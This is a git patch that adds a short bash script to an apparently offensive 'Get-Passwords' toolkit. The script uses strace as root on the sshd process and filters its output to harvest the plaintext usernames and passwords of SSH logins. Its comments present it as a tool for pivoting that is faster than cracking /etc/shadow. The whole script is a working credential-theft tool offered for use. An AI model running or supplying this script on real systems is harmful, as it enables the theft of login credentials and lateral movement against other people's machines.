From 5f45ca1e0f951283310f92ea0062ec46919c8c89 Mon Sep 17 00:00:00 2001
From: dade <0xdade@users.noreply.github.com>
Date: Sat, 22 Jul 2017 17:59:47 -0700
Subject: [PATCH] strace to print user / password of ssh logins

---
 Get-Passwords/sshstrace.sh | 8 ++++++++
 1 file changed, 8 insertions(+)
 create mode 100644 Get-Passwords/sshstrace.sh

diff --git a/Get-Passwords/sshstrace.sh b/Get-Passwords/sshstrace.sh
new file mode 100644
index 0000000..2e18fde
--- /dev/null
+++ b/Get-Passwords/sshstrace.sh
@@ -0,0 +1,8 @@
+#!/bin/bash
+#
+# In a facepalm revelation, it has come to my attention that you can use strace as root to collect passwords from sshd
+# Passwords are useful for pivoting and can be significantly faster than cracking /etc/shadow
+# I've noticed some passwords seem to have an 'r' inserted before them. No idea why...
+#
+
+strace -s 64 -fp `cat /var/run/sshd.pid` 2>&1 | grep --line-buffered -Eo 'write\(4, "\\0\\0\\0\\[0-9]*[^\]{2,}[^\\0]"' | sed -e 's/write(4, "\\0\\0\\0\\[0-9]*\(.*\)"/\1/g'